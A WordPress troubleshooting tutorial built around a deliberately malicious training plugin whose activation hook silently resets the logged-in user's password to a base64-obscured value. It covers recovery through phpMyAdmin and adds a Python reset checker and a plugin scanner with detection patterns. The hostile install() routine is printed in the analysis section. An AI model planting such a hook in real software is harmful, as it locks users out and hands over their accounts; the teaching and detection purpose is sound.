Hacked: Unauthorized password change

Install and activate the attached plugin.

Download Zip – ilovesd.zip

Expected Outcome

When activated, you are immediately logged out and cannot log back in. Your password no longer works. (However, you do have a totally awesome banner of the San Diego Skyline on your site!)


How to fix

The first thing to do is reset your password. While you can do this by using the reset-password link and having a reset email sent to you, there are many instances where this won’t work (for example, you’re fixing a site for a client and the email won’t go to you).

Begin by logging into phpMyAdmin. On MAMP, for example, you can go directly to http://localhost:8888/phpmyadmin.

[Image: Show Databases]

Once inside, click databases to show a list of your databases.

On this list, click the link for your database.

In this example, our database is named wordpress.

This will open your database and show you a list of all its tables. If you do not see a list of tables, click on the tab labeled Structure.

At the bottom (of a normal WordPress install) is the table wp_users. Click on the ‘edit’ icon (see the image below) to open the table.

[Image: wp_users table in the table list]

NB: If you click on the name of the table, it will open the table in information view, and you will have to click on the ‘Browse’ tab to make any changes.

In this view you will see a list of all users. In this example we have only one user. Click on the pencil icon to edit your user information.

[Image: the list of users]

This will bring up an edit user screen. In the field for ‘user_pass’, you will see a whole mess of gibberish like $P$B1hBu0JMpdiP6hHYfwkms4.JKABnwLZ/ (note, that is not a real password; I have no idea what it would be). To change this, type the password you want, in clear text.

In the example below, we have chosen ‘hellodolly’ for its simplicity. DO NOT enter a long, complicated password with punctuation here. This password is just to get us back into our site.

[Image: edit user screen]

Notice in the dropdown box by user_pass we have selected the option ‘MD5’ from the menu. This is because WordPress never stores passwords in a human-readable form, only as a hash (which is also harder to recover if the database leaks). Selecting MD5 makes phpMyAdmin store the MD5 hash of what you typed rather than the clear text; WordPress accepts a plain MD5 hash as a legacy format and, the next time you log in, replaces it with its stronger salted hash (the $P$ form you saw above).

Check that your password is typed correctly, and that MD5 is selected in the dropdown.

Click the ‘Go’ button to the bottom right.

Test the new password on the login screen. If it doesn’t work, check that you’ve followed these instructions exactly (the most common slip is saving the row with the dropdown left empty, which stores the password in clear text instead of as an MD5 hash).
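The phpMyAdmin steps above boil down to writing MD5(password) into wp_users.user_pass. The following Python script is an added example, not part of the original walkthrough, for checking that the row holds what you intended before you go back to the login screen: it computes the value the MD5 function produces for your recovery password, classifies whatever is in user_pass now (phpass hash, legacy MD5 hash, or clear text saved by mistake), and builds the parameterised UPDATE that the phpMyAdmin edit corresponds to. The sample hash is the one quoted above (not a real password); the function names and the default wp_ table prefix are my assumptions.

```python
import hashlib
import re

# Values from the walkthrough: the phpass hash phpMyAdmin showed before the edit
# (not a real password) and the recovery password chosen in the example.
STORED_BEFORE = "$P$B1hBu0JMpdiP6hHYfwkms4.JKABnwLZ/"
RECOVERY_PASSWORD = "hellodolly"


def legacy_md5_hash(password: str) -> str:
    """The value MySQL's MD5() writes to user_pass when 'MD5' is picked in the dropdown."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def classify_user_pass(value: str) -> str:
    """Say what kind of value is sitting in wp_users.user_pass."""
    if value.startswith(("$P$", "$H$")):
        return "phpass"      # WordPress's usual salted, stretched hash
    if re.fullmatch(r"[0-9a-f]{32}", value):
        return "md5"         # legacy hash: accepted at login, then rehashed as phpass
    return "plaintext"       # most likely saved with the dropdown left empty


def recovery_password_is_simple(password: str) -> bool:
    """Enforce the walkthrough's advice: short, letters and digits only, no punctuation."""
    return password.isascii() and password.isalnum() and 1 <= len(password) <= 32


def reset_looks_right(stored_now: str, intended: str) -> bool:
    """True when user_pass holds exactly MD5(intended), i.e. the edit was saved correctly."""
    return classify_user_pass(stored_now) == "md5" and stored_now == legacy_md5_hash(intended)


def reset_statement(login: str, password: str, prefix: str = "wp_"):
    """The UPDATE behind the phpMyAdmin edit, as a parameterised query plus its parameters.

    The table prefix cannot be bound as a parameter, so it is validated instead. The pair
    is meant for cursor.execute(*reset_statement(...)) with PyMySQL or mysql-connector
    (an assumption; any driver using %s placeholders works the same way).
    """
    if not re.fullmatch(r"[A-Za-z0-9_]+", prefix):
        raise ValueError("unexpected table prefix")
    if not recovery_password_is_simple(password):
        raise ValueError("keep the temporary password short and alphanumeric")
    sql = f"UPDATE {prefix}users SET user_pass = MD5(%s) WHERE user_login = %s"
    return sql, (password, login)


if __name__ == "__main__":
    print("before edit:", classify_user_pass(STORED_BEFORE))
    print("expected user_pass after edit:", legacy_md5_hash(RECOVERY_PASSWORD))
    # Paste the user_pass value phpMyAdmin shows after clicking Go into `after`;
    # the placeholder below is what a correctly saved row contains.
    after = legacy_md5_hash(RECOVERY_PASSWORD)
    print("edit saved correctly:", reset_looks_right(after, RECOVERY_PASSWORD))
    print("dropdown left empty would store:", classify_user_pass(RECOVERY_PASSWORD))
    print("equivalent query:", reset_statement("admin", RECOVERY_PASSWORD))
```

If classify_user_pass reports "plaintext" for the value you just saved, repeat the edit with MD5 selected; a clear-text value in user_pass will never match at login, because WordPress compares the MD5 of what you type against it.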


Further understanding

While the fix certainly works (and you can log in just fine now without any odd errors), the actual problem was in the plugin.

Debugging this requires a little knowledge of WordPress and PHP, but it’s pretty straightforward. The first place to start looking is the plugin file itself, ilovesd.php. Since we know the problem happened right away when we activated the plugin, you want to look for anything related to activation.

Near the end of the plugin is this function (see? told you it was obvious):

register_activation_hook( __FILE__, array('ILoveSDPlugin', 'install') );

This runs when the plugin is activated, so if you look back through the plugin for a class called ILoveSDPlugin, you’ll see in there a function called install:

    static function install() {
        global $current_user; // Get the current user's info (unused; the ID below is all that is needed)
        $user_id = get_current_user_id(); // Get the current user ID

        $newpassword=base64_decode('aWFtYW5ldmlsaGFja2Vy'); // Pick a new password, not telling you what it is! NEENER!
        wp_set_password( $newpassword, $user_id ); // Change your password.
    }

This code is very straightforward. It detects the ID of the logged-in user and changes that user’s password to a new one. Seeing base64_decode() applied to a hard-coded string is a strong hint that something nefarious is going on: base64 is not encryption, just an encoding that keeps the string from being readable at a glance. You can decode the string with an online tool such as Coderstoolbox, but it’s obvious enough that any plugin that changes your password when you activate it is bad news.

This is the same logic used by hackers when they want to inject a new user into your WordPress install and use that account to log in and destroy your site. The best remedy is to delete the plugin (not just deactivate it), delete any user accounts you didn’t add (or at the very least change their role to Subscriber) and change all your passwords.
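A defender’s version of the same reasoning, as an added example that is not part of the original post or of the plugin: a small Python scanner that reads plugin source looking for an activation hook combined with calls that change passwords or accounts, plus the obfuscation calls that usually accompany them, and decodes any base64 literal it finds so you can read it without an online tool. The install() routine quoted above is embedded as the sample input, alongside a constructed benign plugin for comparison; the function names, the call lists and the wp-content/plugins path are my own choices, and a hit means "read this file", not a verdict.

```python
import base64
import re
from pathlib import Path

# Constructed sample: the install() routine quoted above, embedded so the scanner runs
# without a WordPress install. Only the surrounding class and the opening tag are added.
SAMPLE_PLUGIN_SOURCE = r"""<?php
class ILoveSDPlugin {
    static function install() {
        global $current_user;
        $user_id = get_current_user_id();
        $newpassword=base64_decode('aWFtYW5ldmlsaGFja2Vy');
        wp_set_password( $newpassword, $user_id );
    }
}
register_activation_hook( __FILE__, array('ILoveSDPlugin', 'install') );
"""

# Constructed benign sample: an activation hook that only records a version option.
BENIGN_PLUGIN_SOURCE = r"""<?php
function myplugin_install() {
    add_option( 'myplugin_version', '1.0' );
}
register_activation_hook( __FILE__, 'myplugin_install' );
"""

# Calls that change who can log in; they have no business in an activation routine.
ACCOUNT_CALLS = ("wp_set_password", "wp_create_user", "wp_insert_user", "wp_update_user")
# Calls commonly used to keep strings or code from being readable at a glance.
OBFUSCATION_CALLS = ("base64_decode", "gzinflate", "str_rot13", "eval")

CALL_PATTERNS = {name: re.compile(r"\b" + re.escape(name) + r"\s*\(")
                 for name in ACCOUNT_CALLS + OBFUSCATION_CALLS}
B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*\)")


def scan_plugin_source(source: str) -> dict:
    """Report the activation hook, account-changing calls, obfuscation calls and decoded literals."""
    report = {"activation_hook": False, "account_calls": [],
              "obfuscation_calls": [], "decoded_literals": []}
    for lineno, line in enumerate(source.splitlines(), 1):
        if "register_activation_hook" in line:
            report["activation_hook"] = True
        for name, pattern in CALL_PATTERNS.items():
            if pattern.search(line):
                key = "account_calls" if name in ACCOUNT_CALLS else "obfuscation_calls"
                report[key].append((name, lineno))
        for literal in B64_LITERAL.findall(line):
            try:
                decoded = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
            except ValueError:          # not valid base64 after all; leave it to the reader
                continue
            report["decoded_literals"].append(decoded)
    return report


def is_suspicious(report: dict) -> bool:
    """Account changes anywhere in a plugin are suspicious on their own; obfuscation is
    worth a look when it sits in a plugin that also hooks activation."""
    return bool(report["account_calls"]) or (
        report["activation_hook"] and bool(report["obfuscation_calls"]))


def scan_plugin_dir(plugins_dir: str) -> dict:
    """Scan every .php file under a plugins directory (wp-content/plugins is the usual path)."""
    hits = {}
    for path in Path(plugins_dir).rglob("*.php"):
        report = scan_plugin_source(path.read_text(encoding="utf-8", errors="replace"))
        if is_suspicious(report):
            hits[str(path)] = report
    return hits


if __name__ == "__main__":
    for label, src in (("ilovesd sample", SAMPLE_PLUGIN_SOURCE),
                       ("benign sample", BENIGN_PLUGIN_SOURCE)):
        rep = scan_plugin_source(src)
        print(f"{label}: suspicious={is_suspicious(rep)} {rep}")
```

Run scan_plugin_dir("wp-content/plugins") from the site root and read every reported file by hand: legitimate plugins do use base64_decode() for embedded images and the like, so the decoded literal and the line numbers are there to make that reading quick, and the account-call list is the part that should almost never be non-empty.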